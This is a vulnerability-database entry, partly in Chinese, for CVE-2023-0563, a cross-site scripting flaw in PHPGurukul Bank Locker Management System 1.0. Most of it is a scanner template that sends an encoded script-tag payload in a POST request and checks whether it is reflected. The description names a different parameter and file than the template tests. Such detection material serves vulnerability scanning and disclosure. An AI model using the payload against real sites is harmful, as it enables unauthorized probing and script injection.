CVE-2023-0563: Bank Locker Management System - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Bank Locker Management System | POC: 已公开

漏洞描述

A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PoC代码[已公开]

id: CVE-2023-0563

info:
  name: Bank Locker Management System - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://vuldb.com/?ctiid.219717
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0563
    - https://vuldb.com/?id.219717
    - https://github.com/ctflearner/ctflearner
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2023-0563
    cwe-id: CWE-79
    epss-score: 0.19327
    epss-percentile: 0.95169
    cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpgurukul
    product: bank_locker_management_system
  tags: cve2023,cve,blms,xss,phpgurukul

http:
  - raw:
      - |
        POST /search-locker-details.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "/><script>alert(document.domain)</script>")'
          - 'contains(body, "Bank Locker Management System")'
        condition: and
# digest: 4b0a00483046022100ec38aa9410bb3e82322e1e011c9fc9d50269dff3a0c77f481a0f483d679455de0221008f542280060a94873f33f9cd968aa213d1143a592f40336b120e57b0c92f3c6d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐